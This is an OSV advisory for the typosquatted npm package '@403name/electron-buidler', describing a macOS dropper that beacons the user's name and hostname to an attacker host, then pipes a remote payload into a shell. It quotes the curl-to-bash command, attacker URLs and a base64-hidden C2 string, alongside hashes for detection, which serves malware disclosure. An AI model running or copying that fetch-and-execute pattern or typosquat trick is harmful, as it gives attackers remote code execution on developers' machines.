MAL-2026-5547
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5547
- Published
- 2026-06-11T03:15:04Z
- Modified
- 2026-06-11T04:01:30.623101675Z
- Summary
- Malicious code in @403name/electron-buidler (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4)
On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes
curl -sSfL <C2>/api/payload/ | /bin/bashvia spawn('/bin/sh','-c',...) with& disownto detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005449", "versions": [ "1.0.1" ], "sha256": "6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4", "source": "amazon-inspector", "modified_time": "2026-06-11T03:15:04Z", "import_time": "2026-06-11T03:48:52.767083914Z" }, { "id": "IN-MAL-2026-005452", "versions": [ "1.0.0" ], "sha256": "bf81a596bee9d4858a18bd26f5037bfdab52f11400c3590dc8b99b6e3e1daa53", "source": "amazon-inspector", "modified_time": "2026-06-11T03:15:24Z", "import_time": "2026-06-11T03:48:53.123610268Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / @403name/electron-buidler
Package
- Name
- @403name/electron-buidler
- View open source insights on deps.dev
- Purl
- pkg:npm/%40403name%2Felectron-buidler
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
indicators
{
"evidence_files": [
{
"path": "index.js",
"sha256": "610475c54a6f7c8a3ca10f849b6fd413f5a50c32d691f4d88db846dc439ee035",
"tlsh": "5da144cd7be73230272311a6da2f980e65be8912154ed918741c93ce1fe07a0926ddfd"
},
{
"path": "package.json",
"sha256": "ace6a81005f9598641133284dd34ee69c1dc97289ef3303cc87408077dd1d29f",
"tlsh": "da012871dd205d7307cc1a519e670d48e1764c1f8c9cbc1833e2821c476e4bb21be65e"
}
],
"package_integrity": [
{
"filename": "electron-buidler-1.0.1.tgz",
"hashes": {
"sha512_sri": "sha512-M7/NtNOvNpPl4dzY1vfETFOVl5Yaih1W/HzVBHFzpLjb1A9lbEeqBk8FNW/f8mxkIkMDabmAmfH/EyvytMcf9Q==",
"sha1": "416b573a7170e0a4686d544b9cd229e8b6b9fef3"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json"